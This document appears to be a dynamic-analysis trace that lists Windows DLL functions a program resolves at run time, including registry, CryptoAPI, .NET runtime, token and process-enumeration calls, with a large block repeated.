DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: propsys.dll/
DynamicLoader: propsys.dll/PSGetNameFromPropertyKey
DynamicLoader: propsys.dll/PSStringFromPropertyKey
DynamicLoader: propsys.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToGUID
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/GetSecurityInfo
DynamicLoader: ADVAPI32.dll/SetSecurityInfo
DynamicLoader: ADVAPI32.dll/GetSecurityDescriptorControl
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: propsys.dll/
DynamicLoader: propsys.dll/PSGetNameFromPropertyKey
DynamicLoader: propsys.dll/PSStringFromPropertyKey
